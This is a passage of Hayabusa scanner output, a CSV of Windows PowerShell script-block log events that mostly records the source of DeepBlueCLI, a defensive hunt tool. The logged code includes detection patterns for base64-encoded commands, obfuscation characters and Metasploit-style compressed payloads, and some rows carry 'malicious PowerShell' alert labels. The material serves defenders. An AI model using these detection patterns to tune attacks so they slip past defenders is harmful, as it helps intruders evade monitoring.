Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.992 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.994 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:32.379 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:32.379 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:32.379 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:32.380 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:33.354 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:09.934 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:24.665 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.663 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 